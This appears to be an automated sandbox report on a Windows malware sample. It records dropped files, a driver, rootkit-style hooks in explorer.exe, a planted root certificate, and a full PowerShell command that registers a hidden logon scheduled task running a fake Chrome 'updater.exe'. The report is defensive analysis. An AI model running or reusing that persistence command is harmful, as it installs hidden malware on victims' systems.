Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ylVAEHbMLf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: ylVAEHbMLf.exe

Static file information: File size 5980672 > 1048576

Source: ylVAEHbMLf.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00

Source: ylVAEHbMLf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior

PE file contains an invalid checksum

Source: updater.exe.0.dr	Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
Source: ylVAEHbMLf.exe	Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
Source: yfiogronfirx.tmp.0.dr	Static PE information: real checksum: 0x25e65 should be: 0x2b1bf

PE file contains sections with non-standard names

Source: ylVAEHbMLf.exe	Static PE information: section name: .xdata
Source: updater.exe.0.dr	Static PE information: section name: .xdata
Source: yfiogronfirx.tmp.0.dr	Static PE information: section name: .xdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B6DD2A5 pushad ; iretd	5_2_00007FFD9B6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7F000C pushad ; iretd	5_2_00007FFD9B7F00C1
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6222B8 push rdx; retf	7_2_00000225DC6222B9
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6284FD push rcx; retf 003Fh	7_2_00000225DC6284FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6594FD push rcx; retf 003Fh	7_2_00000225DC6594FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6822B8 push rdx; retf	7_2_00000225DC6822B9
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6884FD push rcx; retf 003Fh	7_2_00000225DC6884FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6B94FD push rcx; retf 003Fh	7_2_00000225DC6B94FE
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC22B8 push rdx; retf	8_2_00000202C0AC22B9
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC84FD push rcx; retf 003Fh	8_2_00000202C0AC84FE
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AF94FD push rcx; retf 003Fh	8_2_00000202C0AF94FE
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E22B8 push rdx; retf	9_2_000002A6612E22B9
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E84FD push rcx; retf 003Fh	9_2_000002A6612E84FE
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6613194FD push rcx; retf 003Fh	9_2_000002A6613194FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2722B8 push rdx; retf	10_2_000002BAAE2722B9
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2784FD push rcx; retf 003Fh	10_2_000002BAAE2784FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2A94FD push rcx; retf 003Fh	10_2_000002BAAE2A94FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED922B8 push rdx; retf	10_2_000002BAAED922B9
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED984FD push rcx; retf 003Fh	10_2_000002BAAED984FE
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A84FD push rcx; retf 003Fh	11_2_0000026A879A84FE
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A22B8 push rdx; retf	11_2_0000026A879A22B9
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537884FD push rcx; retf 003Fh	12_2_00000179537884FE
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537822B8 push rdx; retf	12_2_00000179537822B9
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537B94FD push rcx; retf 003Fh	12_2_00000179537B94FE
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D594FD push rcx; retf 003Fh	12_2_0000017953D594FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5422B8 push rdx; retf	13_2_000002295D5422B9
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5484FD push rcx; retf 003Fh	13_2_000002295D5484FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5794FD push rcx; retf 003Fh	13_2_000002295D5794FE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E22B8 push rdx; retf	14_2_00000253067E22B9
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E84FD push rcx; retf 003Fh	14_2_00000253067E84FE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E794FD push rcx; retf 003Fh	14_2_0000025306E794FE

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

Drops PE files

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	File created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe			Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Stores large binary data to the registry

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
